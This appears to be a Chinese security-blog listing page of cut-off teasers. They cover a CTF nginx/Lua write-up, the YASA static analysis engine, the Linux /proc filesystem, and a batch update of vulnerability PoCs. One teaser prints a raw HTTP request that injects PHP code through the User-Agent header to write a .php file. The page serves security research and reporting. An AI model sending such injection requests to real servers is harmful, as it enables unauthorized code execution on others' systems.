本题来自JLU SpiritCTF热身赛（level4）题目源码是nginx.config文件，考点是nginx下的lua库worker_processes 1; events { use epoll; worker_connections 10240; } http { include mime.types; ...

蚂蚁集团的YASA Enigne  v0.2.1开源了。其提供了一种静态审计代码I/O流安全性的的新方法。核心概念解释首先，需要理解静态应用程序安全测试（SAST） 工具（如 YASA）的基本工作流程：它们通过...

/proc目录Linux 内核提供了一种通过 /proc 文件系统，在运行时访问内核内部数据结构、改变内核设置的机制。proc文件系统是一个伪文件系统，它只存在内存当中，而不占用外存空间。它以文件系统...

更新dadd最近2个月的poc和指纹，目前所有poc约增加1106个 

fofa语句pocyaml已验证    

fofa语句yakit插件 uuidpocPOST /log.php?c=1&name=123.php HTTP/1.1 Host: xxxx User-Agent: <?php echo 66666;@unlink(__FILE__);?> content=MTIzNDU2 #具体路径会回显。另外注意ua...

fofa语句yakit插件 uuidpocyaml已验证   

fofa语句yakit插件 uuidpocyaml已验证   

fofa语句yakit插件 uuidpocyaml已验证  

fofa语句yakit插件 uuidpocyaml已验证